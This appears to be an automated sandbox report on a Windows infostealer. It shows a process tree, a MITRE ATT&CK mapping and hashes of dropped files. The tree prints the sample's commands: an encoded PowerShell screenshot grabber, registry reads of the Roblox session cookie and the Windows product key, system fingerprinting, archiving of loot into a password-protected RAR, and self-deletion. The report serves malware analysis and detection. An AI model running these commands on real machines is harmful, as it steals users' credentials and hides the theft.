      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4324
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3doj5wi\l3doj5wi.cmdline"
        5⤵
        
        PID:5044
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD949.tmp" "c:\Users\Admin\AppData\Local\Temp\l3doj5wi\CSC7A3574951D9144AA819F2D85ECF65C97.TMP"
        6⤵
        
        PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2356
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4712
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2356
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\RKkeu.zip" *"
    3⤵
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\RKkeu.zip" *
      4⤵
      Executes dropped EXE
      PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built1.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4496
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
a43e653ffb5ab07940f4bdd9cc8fade4

SHA1
af43d04e3427f111b22dc891c5c7ee8a10ac4123

SHA256
c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe

SHA512
62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
970de1b6022c67f216c31e035b7f8e69

SHA1
1d90ebf1e179e058c389fc3b43cbd6ae3d1adacd

SHA256
02d6809bf87b6972c24d96e9f4d8a3b4474a04b82ec42f1ff90ea1da9690265b

SHA512
fc5e309ce4582ee75ec7212030e8a5afb53b8edea5393250f41822f70036e3bc2b89bc7fd5ab2fc85821b16dc9935e99842d7be8fcb1b4a6c8fdd66da63b6379

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
40a2484b7fc454ef68aea23e29f52413

SHA1
a8b1c38bed5f9c0fe3bb08e1f6e4469408eee5c6

SHA256
1856e60f4c4997d77c10d4d9725fd9e34284bffa9aebdf44439bb5f580162235

SHA512
a7d778aae9716bb5e227dd889d628dc26f3d67d4697b0d01529d60b06a9af4bd9dd09dac6397e3f8e5c0b2b574e902817cdff5c5f0ce2682cf6180f152bcdec7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD949.tmp

Filesize
1KB

MD5
e2a903f0707600eff671c91222c363e1

SHA1
37b63878aa71ff64f88087b3cd75194ec39c1963

SHA256
3979612934f53ed3ad332aa12aeb29870de6fa8374a461bf05f5bdecf9edfd9e

SHA512
a7481b66dc2f8991096e9664332519d679715548da0e2b112dc4b401ea0e2e956e330e28dd8863cd4a091b59f80e23c1dfc78acfc482c2e62421379703de157c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_bz2.pyd

Filesize
48KB

MD5
5cd942486b252213763679f99c920260

SHA1
abd370aa56b0991e4bfee065c5f34b041d494c68

SHA256
88087fef2cff82a3d2d2d28a75663618271803017ea8a6fcb046a23e6cbb6ac8

SHA512
6cd703e93ebccb0fd896d3c06ca50f8cc2e782b6cc6a7bdd12786fcfb174c2933d39ab7d8e674119faeca5903a0bfac40beffb4e3f6ca1204aaffefe1f30642c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_ctypes.pyd

Filesize
59KB

MD5
4878ad72e9fbf87a1b476999ee06341e

SHA1
9e25424d9f0681398326252f2ae0be55f17e3540

SHA256
d699e09727eefe5643e0fdf4be4600a1d021af25d8a02906ebf98c2104d3735d

SHA512
6d465ae4a222456181441d974a5bb74d8534a39d20dca6c55825ebb0aa678e2ea0d6a6853bfa0888a7fd6be36f70181f367a0d584fccaa8daa940859578ab2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_decimal.pyd

Filesize
107KB

MD5
d60e08c4bf3be928473139fa6dcb3354

SHA1
e819b15b95c932d30dafd7aa4e48c2eea5eb5fcb

SHA256
e21b0a031d399ffb7d71c00a840255d436887cb761af918f5501c10142987b7b

SHA512
6cac905f58c1f25cb91ea0a307cc740575bf64557f3cd57f10ad7251865ddb88965b2ad0777089b77fc27c6d9eb9a1f87456ddf57b7d2d717664c07af49e7b58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_hashlib.pyd

Filesize
35KB

MD5
edfb41ad93bc40757a0f0e8fdf1d0d6c

SHA1
155f574eef1c89fd038b544778970a30c8ab25ad

SHA256
09a0be93d58ce30fa7fb8503e9d0f83b10d985f821ce8a9659fd0bbc5156d81e

SHA512
3ba7d225828b37a141ed2232e892dad389147ca4941a1a85057f04c0ed6c0eab47b427bd749c565863f2d6f3a11f3eb34b6ee93506dee92ec56d7854e3392b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_lzma.pyd

Filesize
86KB

MD5
25b96925b6b4ea5dd01f843ecf224c26

SHA1
69ba7c4c73c45124123a07018fa62f6f86948e81

SHA256
2fbc631716ffd1fd8fd3c951a1bd9ba00cc11834e856621e682799ba2ab430fd

SHA512
97c56ce5040fb7d5785a4245ffe08817b02926da77c79e7e665a4cfa750afdcb7d93a88104831944b1fe3262c0014970ca50a332b51030eb602bb7fb29b56ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_queue.pyd

Filesize
26KB

MD5
c2ba2b78e35b0ab037b5f969549e26ac

SHA1
cb222117dda9d9b711834459e52c75d1b86cbb6e

SHA256
d8b60222732bdcedddbf026f96bddda028c54f6ae6b71f169a4d0c35bc911846

SHA512
da2bf31eb6fc87a606cbaa53148407e9368a6c3324648cb3df026a4fe06201bbaab1b0e1a6735d1f1d3b90ea66f5a38d47daac9686520127e993ecb02714181f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_socket.pyd

Filesize
44KB

MD5
aa8435614d30cee187af268f8b5d394b

SHA1
6e218f3ad8ac48a1dde6b3c46ff463659a22a44e

SHA256
5427daade880df81169245ea2d2cc68355d34dbe907bc8c067975f805d062047

SHA512
3ccf7ec281c1dc68f782a39f339e191a251c9a92f6dc2df8df865e1d7796cf32b004ea8a2de96fe75fa668638341786eb515bac813f59a0d454fc91206fee632

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_sqlite3.pyd

Filesize
57KB

MD5
81a43e60fc9e56f86800d8bb920dbe58

SHA1
0dc3ffa0ccbc0d8be7c7cbae946257548578f181

SHA256
79977cbda8d6b54868d9cfc50159a2970f9b3b0f8df0ada299c3c1ecfdc6deb0

SHA512
d3a773f941f1a726826d70db4235f4339036ee5e67667a6c63631ff6357b69ba90b03f44fd0665210ee243c1af733c84d2694a1703ebb290f45a7e4b1fc001c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\_ssl.pyd

Filesize
66KB

MD5
c0512ca159b58473feadc60d3bd85654

SHA1
ac30797e7c71dea5101c0db1ac47d59a4bf08756

SHA256
66a0e06cce76b1e332278f84eda4c032b4befbd6710c7c7eb6f5e872a7b83f43

SHA512
3999fc4e673cf2ce9938df5850270130247f4a96c249e01258a25b125d64c42c8683a85aec64ed9799d79b50f261bcfac6ee9de81f1c5252e044d02ac372e5c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\base_library.zip

Filesize
1.3MB

MD5
100dfe4e2eb2ce4726a43dbd4076b4ee

SHA1
5671116823ad50f18c7f0e45c612f41711cff8fe

SHA256
10b1adf18da86baebdbe7ee7561bc0ffa2aabf88e9f03cc34ab7943b25665769

SHA512
1b63f7841ea699c46c86568407d4f1cff21db9f5d57aecc374e3eae3c283349090d828df909f0213d1b177992b49caf22d5154958080fc06238e9e3b0cdf7bb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\blank.aes

Filesize
113KB

MD5
22f3513965562bcdc6834f4b9988dee3

SHA1
28df468acfb0fbb6baa2e010a7670d7aba4b2725

SHA256
534c11b59b93d6594eba07fa5a99fa27ed2380744c2f0c4b301e2b8ffad221c1

SHA512
121b424cde47356b26b1f46de1987b26229c513a738f5e5d1b3d10c65d2d5450a0fc79cb3fc7e19e6132f7c174acac518fd47fe9ec908f94d7a83c5af7bdca42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\python312.dll

Filesize
1.7MB

MD5
18677d48ba556e529b73d6e60afaf812

SHA1
68f93ed1e3425432ac639a8f0911c144f1d4c986

SHA256
8e2c03e1ee5068c16e61d3037a10371f2e9613221a165150008bef04474a8af8

SHA512
a843ab3a180684c4f5cae0240da19291e7ed9ae675c9356334386397561c527ab728d73767459350fa67624f389411d03665f69637c5f5c268011d1b103d0b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\select.pyd

Filesize
25KB

MD5
f5540323c6bb870b3a94e1b3442e597b

SHA1
2581887ffc43fa4a6cbd47f5d4745152ce40a5a7

SHA256
b3ff47c71e1023368e94314b6d371e01328dae9f6405398c72639129b89a48d2

SHA512
56ee1da2fb604ef9f30eca33163e3f286540d3f738ed7105fc70a2bccef7163e0e5afd0aeb68caf979d9493cd5a6a286e6943f6cd59c8e18902657807aa652e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\sqlite3.dll

Filesize
644KB

MD5
8a6c2b015c11292de9d556b5275dc998

SHA1
4dcf83e3b50970374eef06b79d323a01f5364190

SHA256
ad9afd1225847ae694e091b833b35aa03445b637e35fb2873812db358d783f29

SHA512
819f4e888831524ceeed875161880a830794a748add2bf887895d682db1cec29eaddc5eddf1e90d982f4c78a9747f960d75f7a87bdda3b4f63ea2f326db05387

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI47482\unicodedata.pyd

Filesize
295KB

MD5
3f2da3ed690327ae6b320daa82d9be27

SHA1
32aebd8e8e17d6b113fc8f693259eba8b6b45ea5

SHA256
7dc64867f466b666ff1a209b0ef92585ffb7b0cac3a87c27e6434a2d7b85594f

SHA512
a4e6d58477baa35100aa946dfad42ad234f8affb26585d09f91cab89bbef3143fc45307967c9dbc43749ee06e93a94d87f436f5a390301823cd09e221cac8a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ew5n2jku.4yw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\l3doj5wi\l3doj5wi.dll

Filesize
4KB

MD5
1a95ea088c7dd77cfe79af2a32a32508

SHA1
6a436583397770cab96d7f51971aa2c3ba956a62

SHA256
05a4779df49448437c71cfdf4a0201fde2959d3d959fa89923e941851adc1118

SHA512
6b1100db888616bfef6d3d14b3234e46f263754f2318746a2d7f15ac61e4b34f7bde0f3c085d919e7751e0a67ae26c398e11c7e1555999d4e242c872734c6085

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌‍\Common Files\Desktop\ConvertToAssert.jpg

Filesize
720KB

MD5
5702940ad7cce95e0bfd7b5e6e3f4e6e

SHA1
593c5aca2044a6ac38582318d645396ab6d6760a

SHA256
aad103fc3b16393ed6b3d67e7e3c4cc746453a123c5826df79ea0c4e85bdbf21

SHA512
c23d41377b1fa7829701034f5f60b59fee2e33f28d035a9d55fc6045aa383961e6805bc98d6b6e4c7fd58f88e8289f71a669b68421541585f3e3b01961d426e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌‍\Common Files\Desktop\LockSearch.xlsx

Filesize
9KB

MD5
450054f94c5c7878cb3abcb166c40a6f

SHA1
1fd1ca88c7f2367423a54fd3b499e5f6ff0663a6

SHA256
cbb886bfc0ace0d54524a287a8e426bfd18f36df9fc2417c707c9dd2170106cd

SHA512
ec64444c4aa41d9be19864ceb9aed311034bc50e9876ac4d3c298c2e599ff3a31a512c6cf0397be6c37ca67553d71e9b074bb4cce36288dd5433c2ca7da4bff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌‍\Common Files\Desktop\SwitchSuspend.xlsx

Filesize
12KB

MD5
6dc21e547a7288b6778695f87d4f9aae

SHA1
d414e013c2b45fa03164e4aa61fb05f5f61b1250

SHA256
